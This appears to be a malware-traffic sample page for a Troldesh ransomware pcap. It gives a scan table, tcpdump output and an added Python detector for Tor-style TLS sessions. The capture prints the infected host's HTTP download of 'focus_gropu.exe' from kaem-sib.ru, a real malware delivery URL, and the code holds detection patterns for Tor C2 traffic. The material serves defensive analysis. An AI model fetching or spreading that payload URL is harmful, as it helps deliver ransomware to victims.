RANSOMWARE TOR kaem-sib.ru PCAP File Download Traffic Sample Malware Botnet

Download: 1 pcap (focus), 616 KB, added March 25, 2017 2:20 am by admin

Scan report for the downloaded binary (19 of the 61 engine rows are reproduced below):

SHA256:          1d75dc020643b59c4b7745887e00730d2fcf1a129fc21d657402341812429891
File name:       focus_gropu.exe
Detection ratio: 51 / 61
Analysis date:   2017-03-25 00:20:49 UTC

Engine                                  Detection                                    Signature date
McAfee-GW-Edition                       BehavesLike.Win32.Trojan.dc                  20170324
Microsoft                               Ransom:Win32/Troldesh.A                      20170324
eScan                                   Trojan.GenericKD.4586233                     20170325
NANO-Antivirus                          Trojan.Win32.VB.emkvtl                       20170324
Palo Alto Networks (Known Signatures)   generic.ml                                   20170325
Panda                                   Trj/Genetic.gen                              20170324
Qihoo-360                               Win32/Trojan.Dropper.489                     20170325
Rising                                  Malware.Generic.5!tfe (cloud:4TqJyxfiS0C)    20170325
SentinelOne (Static ML)                 static engine – malicious                    20170315
Sophos                                  Troj/Emogen-BV                               20170324
Symantec                                Ransom.Kovter                                20170324
Tencent                                 Win32.Trojan.Vb.Wpjn                         20170325
TrendMicro                              Ransom_CRYPSEN.VC                            20170324
TrendMicro-HouseCall                    Ransom_CRYPSEN.VC                            20170324
VBA32                                   TScope.Trojan.VB                             20170324
VIPRE                                   Trojan.Win32.Generic!BT                      20170325
Webroot                                 Malicious                                    20170325
Yandex                                  Trojan.VB!0amP9/ctkPI                        20170323
ZoneAlarm by Check Point                Trojan.Win32.VB.dkbu                         20170324

Traffic from the pcap (tcpdump -A). The packet headers are reproduced as printed; the raw ASCII dumps of the TLS records have been reduced to the one readable field they carried, the SNI host name. The infected host (192.168.1.102) fetches the executable over plain HTTP and, about seventy seconds later, opens three TLS sessions at once to unrelated hosts, two of them on 9001 (the default Tor ORPort), each with a randomised www.<base32>.com SNI of the kind the Tor client generates. That matches the Troldesh label above: this family carries a Tor client for its C2.

2017-03-24 22:04:51.615705 IP 192.168.1.102.53116 > 176.57.210.35.80: Flags [P.], seq 2149610031:2149610320, ack 1808991785, win 256, length 289: HTTP: GET /focus_gropu.exe HTTP/1.1
GET /focus_gropu.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: kaem-sib.ru
Connection: Keep-Alive

2017-03-24 22:06:01.316270 IP 192.168.1.102.53118 > 208.83.223.34.80: Flags [P.], seq 1865667761:1865667961, ack 2691578719, win 256, length 200: HTTP
    TLS ClientHello, SNI www.rdurehjc3eat.com (tcpdump tags the packet "HTTP" only because of the port; the payload is not HTTP)

2017-03-24 22:06:04.845631 IP 192.168.1.102.53121 > 195.154.183.159.443: Flags [P.], seq 238393047:238393259, ack 2918993764, win 260, length 212
    TLS ClientHello, SNI www.sjfywd4kadz7fm2wyfi5t4ne.com
2017-03-24 22:06:04.852433 IP 192.168.1.102.53123 > 89.163.224.25.9001: Flags [P.], seq 3812081279:3812081489, ack 2996902744, win 256, length 210
    TLS ClientHello on ORPort 9001, SNI www.iprzadmkt4twlqiq2zkf6c.com
2017-03-24 22:06:04.892508 IP 192.168.1.102.53122 > 85.10.201.47.9001: Flags [P.], seq 4258093770:4258093963, ack 4228567313, win 256, length 193
    TLS ClientHello on ORPort 9001, SNI www.x27nr.com
2017-03-24 22:06:04.979745 IP 192.168.1.102.53121 > 195.154.183.159.443: Flags [P.], seq 212:338, ack 754, win 258, length 126
2017-03-24 22:06:04.983145 IP 192.168.1.102.53123 > 89.163.224.25.9001: Flags [P.], seq 210:336, ack 753, win 253, length 126
2017-03-24 22:06:05.011469 IP 192.168.1.102.53122 > 85.10.201.47.9001: Flags [P.], seq 193:319, ack 758, win 253, length 126
2017-03-24 22:06:05.088478 IP 192.168.1.102.53121 > 195.154.183.159.443: Flags [P.], seq 338:376, ack 805, win 257, length 38
2017-03-24 22:06:05.097271 IP 192.168.1.102.53123 > 89.163.224.25.9001: Flags [P.], seq 336:374, ack 804, win 253, length 38
2017-03-24 22:06:05.124872 IP 192.168.1.102.53122 > 85.10.201.47.9001: Flags [P.], seq 319:357, ack 809, win 253, length 38
    The 126-byte and 38-byte segments continue the same three TLS sessions; their payloads contain no readable text.
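The two behaviours in this capture, an executable pulled over plain HTTP and TLS sessions carrying Tor-style SNI names (two of them to ORPort 9001), can be scored directly from tcpdump summary lines and the client payloads. The Python below is an added example, not code from the original post: it extracts the SNI from a TLS ClientHello, parses the HTTP request, and reports the indicators. The packet header lines are abridged from the capture above; the payloads, the two DNS lookups and the www.google.com control session to 203.0.113.5 (a TEST-NET address) are constructed. The SNI shape it checks, www. plus 4 to 25 base32 characters plus .com, is taken from how the Tor client builds its throwaway SNI (crypto_random_hostname in tortls.c).

```python
# Added example: indicators for the behaviours in the capture above (not the page's own code).
import re
import struct

TCPDUMP_HDR = re.compile(r"^(?:\S+ ){1,2}IP (?P<src>\d+\.\d+\.\d+\.\d+)\.(?P<sport>\d+) > "
                         r"(?P<dst>\d+\.\d+\.\d+\.\d+)\.(?P<dport>\d+):(?P<rest>.*)$")
DNS_QUERY = re.compile(r"\bA\? (?P<name>[\w.-]+)\.")  # tcpdump's DNS summary: "A? host. (len)"
# Tor's throwaway SNI is "www." + 4..25 base32 chars + ".com" (crypto_random_hostname in
# tortls.c). Shape alone is weak (www.google.com fits), so scan() also requires that the
# client never resolved the name: Tor dials relay IPs directly and issues no such lookup.
TOR_FAKE_SNI = re.compile(r"^www\.[a-z2-7]{4,25}\.com$")
TOR_ORPORT = 9001


def parse_tcpdump_header(line):
    """Flow fields from a tcpdump summary line, or None for non-IP lines."""
    m = TCPDUMP_HDR.match(line)
    if not m:
        return None
    return {"src": m["src"], "sport": int(m["sport"]), "dst": m["dst"],
            "dport": int(m["dport"]), "rest": m["rest"]}


def extract_sni(payload):
    """server_name from a TLS ClientHello, or None if the bytes are not one."""
    try:
        if payload[0] != 0x16 or payload[5] != 0x01:       # handshake record, ClientHello
            return None
        p = 5 + 4 + 2 + 32                                 # record hdr, hs hdr, version, random
        p += 1 + payload[p]                                # session id
        p += 2 + struct.unpack("!H", payload[p:p + 2])[0]  # cipher suites
        p += 1 + payload[p]                                # compression methods
        end = p + 2 + struct.unpack("!H", payload[p:p + 2])[0]   # no extensions -> struct.error
        p += 2
        while p + 4 <= end:
            ext_type, ext_len = struct.unpack("!HH", payload[p:p + 4])
            p += 4
            if ext_type == 0:            # server_name: list_len(2) name_type(1) name_len(2) name
                name_len = struct.unpack("!H", payload[p + 3:p + 5])[0]
                return payload[p + 5:p + 5 + name_len].decode("ascii")
            p += ext_len
    except (IndexError, struct.error, UnicodeDecodeError):
        pass
    return None


def build_client_hello(sni):
    """Constructed minimal TLS 1.2 ClientHello whose only extension is server_name."""
    name = sni.encode()
    ext = struct.pack("!HHHBH", 0, len(name) + 5, len(name) + 3, 0, len(name)) + name
    body = (b"\x03\x03" + b"\x42" * 32 + b"\x00"          # version, random, empty session id
            + b"\x00\x04\x00\x2f\x00\x35" + b"\x01\x00"   # two cipher suites, null compression
            + struct.pack("!H", len(ext)) + ext)
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack("!H", len(hs)) + hs


def parse_http_request(payload):
    """method/path/host/UA of a plaintext HTTP request, or None if it is not one."""
    head = payload.decode("latin-1").split("\r\n\r\n", 1)[0].split("\r\n")
    m = re.match(r"^(GET|POST|HEAD) (\S+) HTTP/1\.[01]$", head[0])
    if not m:
        return None
    hdrs = {k.strip().lower(): v.strip() for k, v in (h.split(":", 1) for h in head[1:] if ":" in h)}
    return {"method": m[1], "path": m[2], "host": hdrs.get("host"), "ua": hdrs.get("user-agent")}


def scan(packets):
    """packets: (tcpdump header line, client payload bytes) pairs; returns indicator strings."""
    resolved, hits = set(), []
    for line, payload in packets:
        flow = parse_tcpdump_header(line)
        if not flow:
            continue
        q = DNS_QUERY.search(flow["rest"])
        if flow["dport"] == 53 and q:
            resolved.add(q["name"].lower())                # names this host actually looked up
            continue
        http = parse_http_request(payload)
        if http and http["path"].lower().endswith(".exe"):
            hits.append(f"exe over plain HTTP: http://{http['host']}{http['path']} (UA {http['ua']})")
        sni = extract_sni(payload)
        if sni and TOR_FAKE_SNI.match(sni) and sni.lower() not in resolved:
            hits.append(f"Tor-style SNI {sni} never resolved, to {flow['dst']}:{flow['dport']}")
        if flow["dport"] == TOR_ORPORT:
            hits.append(f"default Tor ORPort: {flow['src']} -> {flow['dst']}:{TOR_ORPORT}")
    return hits


# Constructed traffic: headers abridged from the capture above; DNS lines and the 203.0.113.5 control are invented.
HTTP_GET = (b"GET /focus_gropu.exe HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; "
            b"Windows NT 5.1; Trident/4.0)\r\nHost: kaem-sib.ru\r\nConnection: Keep-Alive\r\n\r\n")
SAMPLE = [
    ("2017-03-24 22:04:50.1 IP 192.168.1.102.55001 > 192.168.1.1.53: 4660+ A? kaem-sib.ru. (29)", b""),
    ("2017-03-24 22:04:51.615705 IP 192.168.1.102.53116 > 176.57.210.35.80: Flags [P.], length 289", HTTP_GET),
    ("2017-03-24 22:06:01.316270 IP 192.168.1.102.53118 > 208.83.223.34.80: Flags [P.], length 200",
     build_client_hello("www.rdurehjc3eat.com")),
    ("2017-03-24 22:06:04.845631 IP 192.168.1.102.53121 > 195.154.183.159.443: Flags [P.], length 212",
     build_client_hello("www.sjfywd4kadz7fm2wyfi5t4ne.com")),
    ("2017-03-24 22:06:04.852433 IP 192.168.1.102.53123 > 89.163.224.25.9001: Flags [P.], length 210",
     build_client_hello("www.iprzadmkt4twlqiq2zkf6c.com")),
    ("2017-03-24 22:07:00.1 IP 192.168.1.102.55002 > 192.168.1.1.53: 4661+ A? www.google.com. (32)", b""),
    ("2017-03-24 22:07:00.2 IP 192.168.1.102.53130 > 203.0.113.5.443: Flags [P.], length 517",
     build_client_hello("www.google.com")),
]

if __name__ == "__main__":
    print(*scan(SAMPLE), sep="\n")
```

Run as a script it prints five indicators: the .exe download, three Tor-style SNIs that the host never looked up, and one connection to ORPort 9001. The www.google.com session fits the SNI shape but is not reported because a DNS query for it preceded the handshake; that correlation is what makes the SNI test usable, since the base32 shape alone matches plenty of ordinary domains. Note also that the port test catches only one of the three relays here: two of them listen on 80 and 443, so in production the destination IPs are matched against the current Tor consensus as well.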
